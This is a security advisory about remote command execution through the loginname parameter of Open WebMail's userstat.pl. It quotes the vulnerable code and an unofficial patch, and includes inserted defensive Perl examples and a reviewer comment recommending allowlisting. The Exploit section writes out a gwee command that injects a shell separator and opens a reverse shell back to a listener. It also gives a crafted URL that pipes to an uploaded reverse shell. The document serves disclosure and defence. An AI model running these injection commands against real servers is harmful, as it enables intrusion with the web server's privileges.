[UNIX] Open Webmail Remote Command Execution (userstat.pl)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/11/04
To: list@securiteam.com Date: 11 May 2004 16:08:22 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Open Webmail Remote Command Execution (userstat.pl)
------------------------------------------------------------------------
SUMMARY
" <http://openwebmail.org> Open WebMail is a webmail system based on the
Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage
very large mail folder files in a memory efficient way. It also provides a
range of features to help users migrate smoothly from Microsoft Outlook to
Open WebMail". A remote attacker can run arbitrary commands with the web
server's privileges by exploiting an unfiltered parameter in userstat.pl.
DETAILS
Vulnerable Systems:
* Open Webmail versions 2.20, 2.21 and 2.30
* Limited exploitation on openwebmail-current.tgz that was released on
2004-04-30 (See below)
The vulnerability was discovered in an obsolete script named userstat.pl
shipped with Open Webmail. The script doesn't properly filter shell
metacharacters out of the loginname parameter, which is then used as an
argument when openwebmail-tool.pl is executed from the vulnerable script.
By appending a ";", "|" or "( )" followed by a shell command to an HTTP
GET, HEAD or POST request, an attacker can execute arbitrary system
commands as an unprivileged user (e.g. the Apache user, "nobody" or
"www").
Vulnerable Code:
From userstat.pl (about line 52):

    my $user = cookie('openwebmail-loginname') || param('loginname') || '';
    my $playsound = param('playsound')||'';
    my $html=qq|<a href="_URL_" target="_blank" style="text-decoration: none">|.
             qq|<font color="_COLOR_">_TEXT_</font></a>|;
    if ($user ne "") {
       my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`; # <-- $user is used in the system call
       if ($status =~ /has no mail/) {
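As an added example (not Open WebMail's code), here is the same lookup as in the excerpt above, rewritten so the login name never reaches /bin/sh: the name is checked against an allowlist and the request is rejected if it fails, and openwebmail-tool.pl is started with Perl's list-form pipe open instead of backticks, so the shell never parses $user. The value of $ow_cgidir and the helper names are assumptions.

```perl
#!/usr/bin/perl
# Added example, not Open WebMail's code: the lookup from the userstat.pl
# excerpt, rewritten so the login name never reaches /bin/sh.
use strict;
use warnings;

# Assumed path of the helper script (the advisory's $ow_cgidir variable).
my $ow_cgidir = '/var/www/cgi-bin/openwebmail';

# Allowlist: letters, digits, '.', '_' and '-', 1 to 32 characters. A name
# that fails this is rejected, never "cleaned up" and passed on.
sub valid_loginname {
    my ($name) = @_;
    return 0 unless defined $name;
    return $name =~ /\A[A-Za-z0-9._-]{1,32}\z/ ? 1 : 0;
}

# Run openwebmail-tool.pl with the list form of pipe-open: Perl execs the
# program directly with separate argv entries, so no shell parses $user.
# (Unix Perls; the single-string form would go through the shell again.)
sub mail_status {
    my ($user) = @_;
    die "invalid login name\n" unless valid_loginname($user);
    open(my $fh, '-|', "$ow_cgidir/openwebmail-tool.pl", '-m', '-e', $user)
        or die "cannot run openwebmail-tool.pl: $!\n";
    my $status = do { local $/; <$fh> };
    close $fh;
    return defined $status ? $status : '';
}

# Self-check of the allowlist on constructed inputs, including the two
# payload shapes the advisory describes (a ';' separator and a '|' pipe).
my @cases = (
    [ 'alice',          1, 'plain name' ],
    [ 'bob.smith-2',    1, 'dots and dashes' ],
    [ '',               0, 'empty' ],
    [ ';id',            0, 'semicolon separator' ],
    [ '|/home/fu/bar',  0, 'pipe to absolute path' ],
    [ "alice\nid",      0, 'embedded newline' ],
    [ 'a' x 33,         0, 'too long' ],
);
for my $c (@cases) {
    my ($input, $want, $label) = @$c;
    printf "%-24s %s\n", $label, valid_loginname($input) == $want ? 'ok' : 'MISMATCH';
}
```

The point of the two changes together: the allowlist is what keeps unexpected input out of the request, and the list-form open is what guarantees that even an input the allowlist somehow let through is handed to openwebmail-tool.pl as a single argv element rather than re-parsed by a shell. Either change alone still leaves a single point of failure.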
Exploit:
At least 2 exploits are in circulation, one by Nullbyte and one a rewrite
by Shadowinteger. Exploitation of openwebmail-current.tgz (2004-04-30,
5.8MB) is limited (see 'Vendor Status' below). You can use Gwee (Generic
Web Exploitation Engine), available from http://cycom.se/dl/gwee, to
exploit using the following command:

$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl

-L Use built-in TCP listener (like "nc -l").
-l The host or IP address to have the reverse shell code connect back to.
-p The port to have the reverse shell code connect back to.
Vendor Status:
Cycom AB has provided a diff patch that fixes the issue. Ken Girrard wrote
and published an advisory long before this one. The patch he provided with
his advisory leaves userstat.pl still vulnerable to remote arbitrary
command execution; this patch is applied to (shipped with)
openwebmail-current.tgz released 2004-04-30 (5.8MB).
Girrard's patch doesn't filter out "|" (pipes) and "/", but does filter
out spaces and tabs, which makes it impossible to pass arguments to
commands an attacker would want to execute.
Nevertheless, it's still possible to execute commands without arguments.
An example of such an attack: an attacker who already has write access to
the box (e.g. via FTP) uploads a reverse shell, marks it executable and
enters its absolute path in a crafted URL such as:
http://target/cgi-bin/openwebmail/userstat.pl?loginname=%7C/home/fu/bar
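To make this failure mode concrete, the following added example (not Open WebMail's or Girrard's code) runs a deny-list filter modelled on the behaviour described above, one that strips whitespace but leaves "|" and "/" alone, beside an allowlist, over a few constructed inputs, and reports what each filter would let through to the backtick call. The exact set of characters the stand-in deny-list strips is an assumption, as is the allowlist character set.

```perl
#!/usr/bin/perl
# Added example, not Open WebMail's or Ken Girrard's code: why a deny-list
# that strips characters but leaves '|' and '/' intact still permits
# command execution, and why an allowlist that rejects is the fix.
use strict;
use warnings;

# Stand-in for the kind of filter the advisory describes: it removes
# whitespace and a few separators but not '|' or '/'. This is an assumed
# illustration of the behaviour described, not the actual patch text.
sub denylist_filter {
    my ($name) = @_;
    $name =~ s/[\s;&`\$]//g;
    return $name;
}

# Allowlist: accept only a tight character set, otherwise reject outright.
sub allowlist_ok {
    my ($name) = @_;
    return $name =~ /\A[A-Za-z0-9._-]{1,32}\z/ ? 1 : 0;
}

# Shell operators that would still be interpreted if the filtered value were
# interpolated into `openwebmail-tool.pl -m -e $user`.
sub has_shell_operator {
    my ($value) = @_;
    return $value =~ /[|;&`\$()<>\n]/ ? 1 : 0;
}

# Constructed inputs. The last two are the shapes discussed above: a
# separator plus a command with an argument (the space is stripped, so the
# command name is mangled) and a pipe to an argument-less absolute path
# (nothing is stripped, so the value reaches the shell unchanged).
my @inputs = ( 'alice', ';id', '; ls -l', '|/home/fu/bar' );

# One row per input: original, value after the deny-list, whether that
# value still carries a shell operator, and the allowlist verdict.
sub report {
    my @rows;
    for my $in (@inputs) {
        my $after = denylist_filter($in);
        push @rows, [ $in, $after, has_shell_operator($after), allowlist_ok($in) ];
    }
    return @rows;
}

printf "%-16s %-16s %-9s %s\n", 'input', 'after deny-list', 'shell-op', 'allowlist';
printf "%-16s %-16s %-9s %s\n", @$_ for report();
```

Running it shows the asymmetry: the deny-list turns "; ls -l" into "ls-l" (harmless by accident) but passes "|/home/fu/bar" through untouched with its pipe intact, while the allowlist rejects every input except the plain name. A filter that has to enumerate every dangerous character is only as good as the last character its author remembered; a filter that enumerates the allowed ones does not have that problem.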
Unofficial Patch:
- --- userstat.pl.orig 2004-02-20 14:58:06.000000000 +0100
+++ userstat.pl 2004-02-21 18:05:16.000000000 +0100
@@ -52,6 +52,9 @@
my $html=qq|<a href="_URL_" target="_blank" style="text-decoration:
none">|.
qq|<font color="_COLOR_">_TEXT_</font></a>|;
+# filter out dangerous characters
+$user =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
+
if ($user ne "") {
my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`;
if ($status =~ /has no mail/) {
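Review bot: the added substitution silently strips metacharacters out of $user and the sanitised value is then still interpolated into a shell command on the unchanged line `my $status=\`$ow_cgidir/openwebmail-tool.pl -m -e $user\`;`, so the fix relies entirely on the character class being complete. Prefer rejecting the request when the login name fails an allowlist such as /^[\w.-]+$/ and starting openwebmail-tool.pl with the list form of system() or a list-form pipe open, so no shell parses the value at all. Stripping rather than rejecting also means a mangled name (for example "a;b" becoming "ab") is looked up as a different, possibly existing, user instead of being refused.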
cd cgi-bin/openwebmail/ and run: $ patch -i owm.patch
ADDITIONAL INFORMATION
The information has been provided by <mailto:michel@cycom.se> Michel
Blomgren.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.